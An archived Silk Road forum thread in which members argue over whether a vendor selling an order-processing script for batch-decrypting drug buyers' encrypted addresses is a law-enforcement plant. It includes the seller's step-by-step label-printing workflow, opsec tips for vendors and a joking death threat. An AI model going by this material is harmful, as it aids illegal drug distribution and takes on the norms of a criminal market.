Silk Road forums

Market => Rumor mill => Topic started by: pine on September 05, 2012, 05:10 pm

Title: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 05, 2012, 05:10 pm
I've now made the leap to becoming an SR vendor.  I'm not selling drugs, though, I'm selling software designed to help other vendors.  Specifically to help them process orders and decrypt multiple encrypted addresses in order to do that.

Which means that those vendors processing larger numbers of orders will no longer have to deal with that sinking feeling when they see a large number of encrypted orders.

Let me get this straight.

An anonymous forum poster has just offered you the opportunity to download and execute some software. This software is closed source, uses a programming language which can communicate with the OS and Networks, and it is specifically targeted at the vendors of illegal drugs on an anonymous network.

Is this some kind of joke?

*If* it were open source, *if* it were capable of being audited by other programmers, *if* we could be sure the code wouldn't upload as X to the first few downloaders and Y or Z to the next people who download it, then yeah, offering software services on SR of this nature might just work. Of course, it's still strange to make *sales* of software for *vendors* for economic reasons. I mean there is no market even if every vendor bought the software. He could counter by arguing he is being altruistic in trying to aid SR for philosophical reasons (hence the new logo/avatar), but if that was the case the code would be open source and capable of being audited by others, possibly with an anonymous bitcoin 'tip jar' available.


But LouisCyphre *already* knows this. He has to. Nobody could be involved in IT security at any level and not know this. That means LouisCyphre is almost certainly a LE agent who has social engineered his way into SR's community with the hope that doing so will aid the delivery of a deanonymizing software exploit.


There are only two options. Either Cyphre has done something incredibly naive due to blindsight/having no money, or he is a LE agent.

Louis does not strike me as naive.

Discuss.

A final note to Louis. The platypus is a friendly, cute, comfort loving aquatic mammal, but as you recently noted, they also have poisoned spurs to defend their territory.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: spacecase #2 on September 05, 2012, 05:13 pm
Officer Pine, that's not nice to rat on your fellow LE partner, now is it?
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: MC Haberdasher on September 05, 2012, 05:34 pm
Officer Pine, that's not nice to rat on your fellow LE partner, now is it?


 ;D  I gotta admit, that made me chuckle.  Definitely didn't see that coming after reading and scrolling down the first post.   

Pine has a point though, seems a little funny-style to me as well.

Time always tells the truth...
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 05, 2012, 06:13 pm
This is the listing: http://silkroadvb5piz3r.onion/index.php/silkroad/item/db203c965e

Quote
Silk Road Order Processing Python Toolkit (sroppy)

฿11.54

seller: LouisCyphre
ships from: undeclared
ships to: Worldwide
category: CDs, DVDs, software, etc.

Description

The Silk Road Order Processing Python Toolkit (sroppy) is a small collection of shell and python scripts designed to make processing encrypted orders simpler for SR vendors.

Version number: 1.1
License: GPLv3


=== Important Note ===

This software is intended for use by Silk Road vendors only. While I won't object to other buyers purchasing it, the usefulness of it elsewhere may be limited.

Before purchasing this product, please contact me with any questions and so we can run some initial checks to make sure the software will run on your system.


=== System Requirements ===

* A UNIX-like operating system - Linux, BSD, OS X, etc.
* Python 2 - 2.7.3 recommended, but should work with versions 2.3 to 2.6 too.
See http://www.python.org/ for details.
* Bash - should already be installed on UNIX-like systems.
* HTMLDOC software package.
See http://www.htmldoc.org/ for details.
* A spreadsheet program like LibreOffice Calc.

Users on Apple OS X may also need to install the Xcode developer toolkit from Apple to install HTMLDOC.


=== What It Does ===

You save your order page into a spreadsheet as a CSV file. Edit the file to create two new CSV files, one for encrypted addresses and one for plain text addresses and save those to the filenames specified in the README.txt file. Then run the software.

The code then grabs the address data out of the two new files, decrypts the encrypted addresses, writes the decrypted data and the other plain text addresses to HTML and then converts that to PDF or PostScript. The PDF files are then printed to envelopes, labels or paper, depending on your packaging requirements.

The software is modular so if you don't deal with encrypted data you can skip that step. If you only deal with encrypted data then you can skip the step grabbing plain text addresses.

NOTE: The conversion from HTML to PDF is performed by the HTMLDOC program. This program can only convert to A4, US Letter and Universal page sizes. Part of the individual customization process will be setting the right parameters to print to your requirements. See below for customization details.


=== What You Get ===

* The software.
* Initial support for installation and customization of approx. 2 to 3 hours (that's time spent actually working with you and I'll be reasonable with customers).
* Fixing of any bugs.
* Major updates at reduced price (via a custom order).
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: spacecase #2 on September 05, 2012, 07:21 pm
I know the vendor who asked Louis to make this.

It wasn't Louis's initial idea. He was paid only after he made it for free.

He made it in hours after the req.

Think what you will, but you can always use his software on a machine that's not connected to the net.

Also the software does work.

Then why won't he release the code?
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: sickgirl on September 05, 2012, 08:07 pm
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible. Cannot be licensed under GPL otherwise.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: quinone on September 05, 2012, 08:18 pm
Which means that those vendors processing larger numbers of orders will no longer have to deal with that sinking feeling when they see a large number of encrypted orders.

Yeah, I definitely get a sinking feeling when business is doing well and i'm making lots of sales, <snicker>

He shouldn't call it SROPPY either, he should call it SLOPPY because that's all it appears to be

Thanks for heads up though pine, i personally don't buy any software off any vendor just cuz .. i'm paranoid, but i'm sure there are many who don't know better/haven't read this thread
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: BlueSkyTraders on September 05, 2012, 08:22 pm
Not sure if a collection of shell and python scripts qualifies as closed source. Rather sloppy to release an exploit in easy-to-read form.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 05, 2012, 08:24 pm
is it even possible to make python programs closed source? What is it, bytecode?
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 05, 2012, 08:27 pm
Anyway that aside, here are my rules for thinking software people here say I should run is not part of a law enforcement operation:

A. It is not for sale but is made available freely to everyone for auditing purposes. If you want money for your work, ask for donations.
B. It is, of course, entirely open source
C. Preferably, the source code is posted in a thread on this very forum
D. Enough time has passed for several people who know the language to give it the go ahead, preferably myself being one of them :P

failing to meet criteria A through D results in me not trusting your software, and by extension not trusting you.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Lucius Luv on September 05, 2012, 08:55 pm
Ha.. So he wants vendors to dl private software?

LE, or can be a very interesting way to possibly get a shit load of bitcoins via the theft of information like pw and pins.  I will never ever buy anything legal on this site for obvious reasons.. unless it's going to a drug free drop.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: BitShuffle on September 05, 2012, 10:46 pm
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible. Cannot be licensed under GPL otherwise.

Not only is he providing it under GPL, but he says that it is all shell and python scripts. Scripts are, by their very nature, source code.

I don't know LouisCyphre from Boo and don't have a need for his scripts, but I think any concerns about him being LE are extremely presumptuous.

In fact, I would go so far as to say that making such an accusation with such flimsy evidence is reckless and uncalled for.

My 0.02 BTC...

- Bit
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: BigEasy on September 05, 2012, 11:16 pm
I don't know LouisCyphre from Boo and don't have a need for his scripts, but I think any concerns about him being LE are extremely presumptuous.

In fact, I would go so far as to say that making such an accusation with such flimsy evidence is reckless and uncalled for.

I'll second that!!   Nothing has been said to prove that Cyphre is anything of the kind. He is not the only vendor who provides "software", would you trust any of these products more or less:

http://silkroadvb5piz3r.onion/index.php/silkroad/item/b9eced345d
http://www.silkroadvb5piz3r.onion/index.php/silkroad/item/3e4be45be5

Fact is python code is not too hard to go through if you know some code. These facts aside I am not saying that any of these products have backdoors or trojans in them. I sure as heck wouldn't trust a VM that someone sold me off of SR to use to do anything illegal. According to Sands, Cyphre's code was produced initially for a vendor and does work.

Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:06 am
I've now made the leap to becoming an SR vendor.  I'm not selling drugs, though, I'm selling software designed to help other vendors.  Specifically to help them process orders and decrypt multiple encrypted addresses in order to do that.

Which means that those vendors processing larger numbers of orders will no longer have to deal with that sinking feeling when they see a large number of encrypted orders.

Let me get this straight.

You didn't.  By the way, you could have messaged me first and I could have addressed it privately, but what the Hell.

An anonymous forum poster has just offered you the opportunity to download and execute some software.

Yep, this much is correct.

This software is closed source,

No, actually it's not, all the source code is available to those who purchase it.  It's even under a GPL, I'm operating on the assumption that people will want to buy from the author who will be able to solve any issues they have with it.

uses a programming language which can communicate with the OS and Networks, and it is specifically targeted at the vendors of illegal drugs on an anonymous network.

Well, it could probably be adapted for other similar types of sites (by function rather than content), but most of those already have APIs.

Is this some kind of joke?

Nope.  It's a response to Peach's "buyer's etiquette" thread in the Silk Road Discussion forum a couple of weeks ago.

*If* it were open source,

It is.

*if* it were capable of being audited by other programmers,

It's not very big at this point and only performs two main tasks.  It's very easy to audit.

In fact, in addition to the thread I mentioned above, this also grew out of a private request by another vendor to produce the code.  That vendor knows exactly what it does (no, I'm not going to name them, their forum name is different from their vendor name, but if they choose to step in here and confirm I won't object).  So that vendor already knows what each part of the code does, that it only runs on the vendor's system and makes no network connections.

I'll tell you what, I'll speak to DPR about independently vetting it offline.  Would that be good enough?

*if* we could be sure the code wouldn't upload as X to the first few downloaders and Y or Z to the next people who download it, then yeah, offering software services on SR of this nature might just work.

I reckon it can, that's why I'm bothering to do this.

Of course, it's still strange to make *sales* of software for *vendors* for economic reasons. I mean there is no market even if every vendor bought the software.

The market is certainly a niche one.  Especially when it may not be worth it for smaller volume vendors.

I may come up with something for buyers later, but my focus is just this for now.

He could counter by arguing he is being altruistic in trying to aid SR for philosophical reasons (hence the new logo/avatar),

I'm being an agorist, not an altruist.

but if that was the case the code would be open source and capable of being audited by others,

The GPL does not prevent selling the software, the code is distributed under the GPLv3.

possibly with an anonymous bitcoin 'tip jar' available.

The return on that would be insignificant.

I know that the code will pass any audit, that it does not connect to any other systems from where it is run and does not re-implement OpenPGP (it calls GPG to decrypt multiple files simultaneously using the --decrypt-files flag I mentioned in Peach's thread).

But LouisCyphre *already* knows this. He has to. Nobody could be involved in IT security at any level and not know this.

There's more than one way to distribute open source software and it does not require giving it away.

That means LouisCyphre is almost certainly a LE agent who has social engineered his way into SR's community with the hope that doing so will aid the delivery of a deanonymizing software exploit.

Complete and utter bullshit, both regarding me and the software.

All the software does is this (with user interaction):

1)  The vendor logs into SR, views their order page and selects the order data (which is an HTML table).
2)  The vendor copies the entire table into a spreadsheet (e.g. LibreOffice Calc) and saves it.
3)  The vendor edits out the entries containing no encrypted data and saves all the entries containing encrypted data in the address field into a new CSV file called cryptorders.csv.
4)  The vendor opens the original spreadsheet in no. 2 and does the same thing for unencrypted data, saved as clearorders.csv.
5)  The vendor runs the first script which reads the CSV and saves separate files named according to the buyer's username, the transaction number and writes the content of the address field to that text file.  It then invokes GPG (gpg --decrypt-files *.asc) to decrypt the encrypted data.
6)  The vendor then runs the second script to review *.txt and make sure those files only contain names and addresses for printing.
7)  The next major piece of code rewrites all of those addresses as basic HTML.  That HTML is then converted to PDF using a third party program which needs to be installed (HTMLDOC, which is released under GPLv2 and is available at www.htmldoc.org).
8)  Then the labels/envelopes are printed.

Currently the Python code uses the csv module and basic Python functions, mainly involving lists, reading files and writing new files.

There are only two options. Either Cyphre has done something incredibly naive due to blindsight/having no money, or he is a LE agent.

Your logic is flawed.

I'm not going to make enough money to live off it, but I don't see what's wrong with making some money off it.

The LE accusation only holds true if the code can somehow report on users, which it doesn't.  It can quite easily run on a completely disconnected system.  It makes no difference to the program.

Pine, this is the second time you've accused me of being LE based on a misunderstanding of software.  The first time was not understanding how GPG verifies signatures.  You were able to verify that my explanation matched GPG's documentation independently and I have no doubt that in time the independent verification will prove me right here.

Louis does not strike me as naive.

Thanks.

Discuss.

Gladly.  Got any other questions I haven't addressed already?

A final note to Louis. The platypus is a friendly, cute, comfort loving aquatic mammal, but as you recently noted, they also have poisoned spurs to defend their territory.

Also, from memory, only the males have the spurs.  So it's more accurate to say yours are Schrödinger's spurs.  It's been a few years (or so, I'm not going to be specific on the number for my security) since I've been in Australia, but I've been fascinated by the weird animals they have down there.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:11 am
This is the listing: http://silkroadvb5piz3r.onion/index.php/silkroad/item/db203c965e

Thanks for the advertising, I'll update the listing later to refer to this thread as well.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:13 am
I know the vendor who asked Louis to make this.

It wasn't Louis's initial idea. He was paid only after he made it for free.

He made it in hours after the req.

Think what you will, but you can always use his software on a machine that's not connected to the net.

Also the software does work.

Thanks.  :)
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:20 am
I know the vendor who asked Louis to make this.

It wasn't Louis's initial idea. He was paid only after he made it for free.

He made it in hours after the req.

Think what you will, but you can always use his software on a machine that's not connected to the net.

Also the software does work.

Then why won't he release the code?

See my response to Pine's initial post.  The software is being distributed under the GPLv3, but it is not being distributed for free by me.  That wouldn't stop someone buying it and then posting the code, but I'm including the 2 to 3 hours of support plus client specific customisation (which I expect to be for customising the PDF conversion component and printing command) with my listing.

Distribution which does not come from me obviously doesn't benefit from that.  If it ends up being released (or resold) by others, I'll probably add a custom listing for support to people who obtain it in other ways and find that they need help with it.

It's not very complicated at the moment, but porting it to Windows will probably require additional functions.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: googleyed1 on September 06, 2012, 12:23 am
it's completely pointless software anyway lol,

he proposes solution to a problem none of us vendors face

no one will buy hahah

nice LE can donate fees to keep SR alive though =D
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:28 am
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible. Cannot be licensed under GPL otherwise.

Exactly!  Also, I figured that using any other license wouldn't matter if others who receive the code release it anyway, so I selected a license that guarantees other changes be able to be released.

I didn't choose the GPL Affero v3 because that would require publicly releasing every version, including customised ones for specific clients.  For example, the version currently available is version 1.1, but version 1.0 doesn't have the code for handling plain text orders only because the vendor who initially contacted me cancels unencrypted orders.

Obviously the GPLv3 does not prevent selling code released under that license.  Without going into specifics, I've discussed this with RMS face-to-face, but all this can be confirmed from the Free Software Foundation.

The GPLv3 simply grants certain rights to users and the obligation that the source be made available with the distribution.  Since the distribution *is* the source code (Python executables are great like that), then that obligation is covered.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:32 am
Which means that those vendors processing larger numbers of orders will no longer have to deal with that sinking feeling when they see a large number of encrypted orders.

Yeah, I definitely get a sinking feeling when business is doing well and i'm making lots of sales, <snicker>

It depends on volume.  The SR system doesn't provide the function that this software does (converting address data to a printable form).

He shouldn't call it SROPPY either, he should call it SLOPPY because that's all it appears to be

I disagree, but then I'm supposed to.

Thanks for heads up though pine, i personally don't buy any software off any vendor just cuz .. i'm paranoid, but i'm sure there are many who don't know better/haven't read this thread

An understandable attitude.  Hopefully Pine's fears will be addressed here.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:34 am
Not sure if a collection of shell and python scripts qualifies as closed source. Rather sloppy to release an exploit in easy-to-read form.

It's not closed source.  There's no way I'd expect vendors to use some closed source thing, that'd be just asking for trouble.

Actually a closed source app would be grounds for making an LE accusation.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:39 am
No matter how trusted anyone is, I wouldn't have run the code even on a virtual machine. Only in case it is stored in gentoo repository and signed with developers' keys. Or it is very short to audit it. I think vendors probably know what they do. I won't stop them if they buy anything.

It's very short and very clear.

That means LouisCyphre is almost certainly a LE agent who has social engineered his way into SR's community with the hope that doing so will aid the delivery of a deanonymizing software exploit.

Now we know that Louis is a LE agent.

No you don't, you're simply believing a hyped up false assumption.

I am beginning to think that death will finally be upon him and that he should find some place to hide where he would not be found. But we're not going to kill him, are we Pine?

I take my security seriously, I doubt anyone here will track me down or could even be bothered to.  I follow the same type of non-aggression principle as other agorists, though, so if someone did I'd defend myself by whatever method I deemed appropriate under the circumstances.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:41 am
is it even possible to make python programs closed source? What is it, bytecode?

No, it's just .py and .sh scripts which are executable.  The closed source claim is a red herring to back up the LE false assumption.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:49 am
Anyway that aside, here are my rules for thinking software people here say I should run is not part of a law enforcement operation:

A. It is not for sale but is made available freely to everyone for auditing purposes. If you want money for your work, ask for donations.

It's not free of cost, but it is released under GPLv3 and is easy to audit by buyers (just by following a Python tutorial and then looking at the code).

I'm going to speak to DPR after I've finished these replies and see if he wants to review the code.

B. It is, of course, entirely open source

It is.

C. Preferably, the source code is posted in a thread on this very forum

I'm not going to because I'm trying to sell it, but if someone buys it and posts the code then I can't stop them.  The GPL allows that.

D. Enough time has passed for several people who know the language to give it the go ahead, preferably myself being one of them :P

Well, that is what auditing is for.

failing to meet criteria A through D results in me not trusting your software, and by extension not trusting you.

An understandable approach.  I don't expect you to trust this straight away, but I suspect that in time you'll see that Pine's accusation is a false one.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:51 am
Ha.. So he wants vendors to dl private software?

Open source software.  It's free as in freedom, not as in beer.

LE, or can be a very interesting way to possibly get a shit load of bitcoins via the theft of information like pw and pins.  I will never ever buy anything legal on this site for obvious reasons.. unless it's going to a drug free drop.

It doesn't do that, I've described above exactly what it does.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Wazup7 on September 06, 2012, 12:52 am
I think Louis pretty much defended himself to everyone's satisfaction.  That being said, it's easy to see how naive vendors who don't know much about code could be convinced to use software that might record their actions, etc.

To me, the idea of buying a piece of software to do something that I can do manually just seems like another way that my security can be compromised.  (I mean in the context of Silk Road--in real life, that's the point of software...to automate and simplify tasks that we do repetitively).  Obviously, any vendor that does purchase your software should do their due diligence to ensure that the software does what they think it does and nothing more.  But that's up to each vendor to take upon themselves.  Not doing so would constitute a huge risk.  It's open source, so it falls completely on the vendor who purchases it.

All in all, I'll just say good luck to LouisCyphre.  You put the time in, developed a solution to a "problem", and now you will hopefully make something from it.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:53 am
OMG Louis I'm sorry about this thread here....

No you see what SR vendors have to deal with...

sheer idiocy....

Oh, I well and truly get it.  As for the thread, it's not your fault and I'm sure time will prove the veracity of what I say.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 12:57 am
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible. Cannot be licensed under GPL otherwise.

Not only is he providing it under GPL, but he says that it is all shell and python scripts. Scripts are, by their very nature, source code.

Exactly.  The choice of using Bash and Python was deliberate for that reason.

I don't know LouisCyphre from Boo and don't have a need for his scripts, but I think any concerns about him being LE are extremely presumptuous.

In fact, I would go so far as to say that making such an accusation with such flimsy evidence is reckless and uncalled for.

Thanks.  :)
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Shroomeister on September 06, 2012, 01:01 am
Oh Pine, you are such a moron. See what you gone and done?!
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 01:09 am
it's completely pointless software anyway lol,

he proposes solution to a problem none of us vendors face

If that were true then I wouldn't have been approached by a vendor in the first place.

no one will buy hahah

Time will tell, but I never expected to get many sales for such a niche product.

nice LE can donate fees to keep SR alive though =D

They haven't through me, but LE funding SR would be funny.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: googleyed1 on September 06, 2012, 01:14 am
sorry LC i wasn't really thinking, i just generally take pine's word for gold =D

all the luck with your venture
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 01:16 am
I think Louis pretty much defended himself to everyone's satisfaction.

Thanks.

That being said, it's easy to see how naive vendors who don't know much about code could be convinced to use software that might record their actions, etc.

Which is understandable.

To me, the idea of buying a piece of software to do something that I can do manually just seems like another way that my security can be compromised.  (I mean in the context of Silk Road--in real life, that's the point of software...to automate and simplify tasks that we do repetitively).

Also understandable, which is why it is open source and easily able to be audited.

Obviously, any vendor that does purchase your software should do their due diligence to ensure that the software does what they think it does and nothing more.  But that's up to each vendor to take upon themselves.  Not doing so would constitute a huge risk.  It's open source, so it falls completely on the vendor who purchases it.

I expect that part of the support component of the purchase will be explaining what each part of the code does to the user's satisfaction.

All in all, I'll just say good luck to LouisCyphre.  You put the time in, developed a solution to a "problem", and now you will hopefully make something from it.

Thanks.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Wadozo on September 06, 2012, 01:22 am
Why did pine fly off the handle and make accusations about LouisCyphre which are seemingly untrue and could potentially stifle new business through his vendor's account? Very strange indeed! It's not like pine to make such a simple mistake as claiming the software is closed source when clearly it's not.  ??? I feel LouisCyphre has more than adequately posted answers to all questions asked of him. Well done LouisCyphre.  :)
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: InkIndulgence on September 06, 2012, 01:23 am
An application like this would not be difficult to make, (not trying to downgrade your hard work!) would not be an overwhelming amount of code, and if it's open source would easily be detected to be anything other than advertised by an average software person. I think he just likes to code and wanted to help.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: spacecase #2 on September 06, 2012, 01:25 am
^because pine is le, been trying to tell you guys that.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 01:25 am
sorry LC i wasn't really thinking, i just generally tke pine's word for gold =D

all the luck with your venture

Thanks.  I understand why people might automatically react in support of Pine, I'm not angry at them or you.  Other projects of Pine's, like PGP Club, are valuable additions to SR, which is why I'm still involving myself in PGP Club.

Some people are concerned and have questions and I'm happy to address those questions, hence the large number of replies here.

The irony, though, is that this thread came less than 48 hours after I posted this on the problems of accusations without basis:

http://dkn255hz262ypmii.onion/index.php?topic=37834.msg448062#msg448062
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: wizdom on September 06, 2012, 01:54 am

Now we know that Louis is a LE agent. I am beginning to think that death will finally be upon him...But we're not going to kill him, are we Pine?



We don't ask Pine what will be done, we do what Pine instructs us to do -- without question!


Modzi
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 06, 2012, 01:58 am
Why did pine fly off the handle and make accusations about LouisCyphre which are seemingly untrue and could potentially stifle new business through his vendor's account ? Very strange indeed! It's not like pine to make such a simple mistake as claiming the software is closed source when clearly it's not.  ??? I feel LouisCyphre has more than adequately posted answers to all questions asked of him. Well done LouisCyphre.  :)

I still think vendors selling software sets a precedent that we need to be careful about. A lot of good can come from having programmers working to make software to help us become more secure and make our lives easier. In fact, I have some projects of my own that I am working on. At the same time we need to realize that the people here are of course risking very real prison sentences, and that the utmost care must be taken regarding running software from people. I think that the best approach is one of open source publicly audited only. If a vendor knows enough python to audit the code they will make it themselves, so there is no point in anyone who is capable of auditing it paying for it. I don't think that we should have a culture here that promotes haphazardly running code from others, that will certainly lead to people being pwnt and I can very easily see Pine's concern, although I also see that she is somewhat fear mongering or at least talking about technical things she doesn't know enough about to make accusations based on (for example claiming a python program is closed source, I don't know if that is even possible, maybe it can be distributed as bytecode or obfuscated, but that is hardly what anyone thinks of when python scripts are mentioned, and it seems she has absolutely nothing to base her claims of this software not being open source on).

My suggestion remains, that people not use software offered by people here, unless it is open source and the code is available for everyone here to audit. I think this is the only way we can create tools for each other to use while not being at risk of malicious activity. I would love to make money from the tools I will hopefully be providing soon, but I realize that nobody in their right mind is going to run code from here unless it is publicly audited, and the people who do are going to end up getting pwnt, be it from Louise or someone else.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 02:00 am
Why did pine fly off the handle and make accusations about LouisCyphre which are seemingly untrue and could potentially stifle new business through his vendor's account ? Very strange indeed! It's not like pine to make such a simple mistake as claiming the software is closed source when clearly it's not.  ???

That is something I'd like an answer to as well, but I'm not holding my breath.

I feel LouisCyphre has more than adequately posted answers to all questions asked of him. Well done LouisCyphre.  :)

Thanks.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 02:05 am
An application like this would not be difficult to make, (not trying to downgrade your hard work!) would not be an overwhelming amount of code, and if it's open source would easily be detected to be anything other than advertised by an average software person.

Right on all points.  The entirety of the code is currently under 200 lines (including comments) and spread across a bit over half a dozen files (not counting documentation, the license and my key, which are included).

I think he just likes to code and wanted to help.

And possibly make some money for my time, but yes.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 02:06 am
^because pine is le, been trying to tell you guys that.

You're welcome to your opinion, but please hold off on the accusations without proof.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: painbow on September 06, 2012, 02:12 am
So someone please tell me who is da realest LE in this mothafuckin thread so I avoid buying drugs from him/her!!

Thank you very much.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: Ting on September 06, 2012, 02:16 am
Can a pro seller cough up the coin to buy this code, and post it? Open source python (what he says) is easy to read and if we can spot LE or a hacker, imagine the hilarity! If it's clean and it works, we will see!
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: LouisCyphre on September 06, 2012, 02:36 am
Why did pine fly off the handle and make accusations about LouisCyphre which are seemingly untrue and could potentially stifle new business through his vendor's account ? Very strange indeed! It's not like pine to make such a simple mistake as claiming the software is closed source when clearly it's not.  ??? I feel LouisCyphre has more than adequately posted answers to all questions asked of him. Well done LouisCyphre.  :)

I still think vendors selling software sets a precedent that we need to be careful about. A lot of good can come from having programmers working to make software to help us become more secure and make our lives easier. In fact, I have some projects of my own that I am working on.

Cool.

At the same time we need to realize that the people here are of course risking very real prison sentences, and that the utmost care must be taken regarding running software from people.

Fair enough, I agree.

Also, since I am not LE and am providing software which can facilitate vendor operations I think real LE would love to prosecute me for that.  Probably a conspiracy charge for every sale plus the initial contract which led to it.

I think that the best approach is one of open source publicly audited only.

I can see your point, but your faith in the generosity of users is, I suspect, exaggerated.  Your previous suggestion of a developer tip jar would be unlikely to garner more than a few BTC.  I'm basing this opinion on my experience with PGP Club and GPG instruction in other threads and via PMs.

There's nothing in the GPL which prevents selling the code under that license.  In fact, here's the part of the FAQ which relates to it:

Quote
If I use a piece of software that has been obtained under the GNU GPL, am I allowed to modify the original code into a new program, then distribute and sell that new program commercially?

    You are allowed to sell copies of the modified program commercially, but only under the terms of the GNU GPL. Thus, for instance, you must make the source code available to the users of the program as described in the GPL, and they must be allowed to redistribute and modify it as described in the GPL.

    These requirements are the condition for including the GPL-covered code you received in a program of your own.

Clearnet source: https://www.gnu.org/licenses/gpl-faq.html#GPLCommercially

If a vendor knows enough python to audit the code they will make it themselves, so there is no point in anyone who is capable of auditing it paying for it.

Yep.

I don't think that we should have a culture here that promotes haphazardly running code from others, that will certainly lead to people being pwnt and I can very easily see Pine's concern,

I can understand that concern too and I share it.  There have been calls for SR's source code to be released for similar reasons, but that's not too likely either.

although I also see that she is somewhat fear mongering or at least talking about technical things she doesn't know enough about to make accusations based on

Thanks.  She does jump to conclusions sometimes, this isn't the first time.

(for example claiming a python program is closed source, I don't know if that is even possible, maybe it can be distributed as bytecode or obfuscated, but that is hardly what anyone thinks of when python scripts are mentioned, and it seems she has absolutely nothing to base her claims of this software not being open source on).

It's possible to compile Python code as a Windows executable, but that's not what this is.  I did it once years ago and it turned a script that was a few Kb in size into something like 1.5Mb.  Ridiculous.  I'd rather just install Python, if it's not already installed, and run the code.

I've never bothered trying to reverse engineer the bytecode from any of my scripts, but I believe it's usually pretty straight forward.  I think it might be possible to obscure it, but I can't remember because I've never been interested in doing that.

My suggestion remains, that people not use software offered by people here, unless it is open source and the code is available for everyone here to audit. I think this is the only way we can create tools for each other to use while not being at risk of malicious activity. I would love to make money from the tools I will hopefully be providing soon, but I realize that nobody in their right mind is going to run code from here unless it is publicly audited, and the people who do are going to end up getting pwnt, be it from Louise or someone else.

There's no "e" in my first name.  Unlike Pine, I'm not quibbling about my gender.  ;)

Anyway, I certainly understand your point of view, which is why I'm aiming for balance between being able to sell my product and address valid security concerns.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 06, 2012, 03:30 am
Think what you will, but you can always use his software on a machine that's not connected to the net.

Of course. All vendors use physical Air Gaps by burning information from the Internet on read only CD/DVDs, decrypt on the isolated machine, and then in order to communicate back across the Air Gap they use either the keyboard to transfer information across to the networked machine using their eyeballs, or else they utilize something like a checksum to ensure the information coming back on a read only CD/DVD is precisely what was intended to come back across. This will mean manually adding up and knowing the exact data.

Because that's pretty much the only way what you said would work, could work. Otherwise it just doesn't. So what you said is essentially for practical purposes complete bullshit.

Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible, Cannot be licensed under GPL otherwise.

Yes. Because it's totally irrelevant so long as the code is not explicitly posted whereby it can be audited. For several reasons, four of which are:

A: What you get today, may not be what you get tomorrow. A bait and switch is as simple as it gets with exploits.

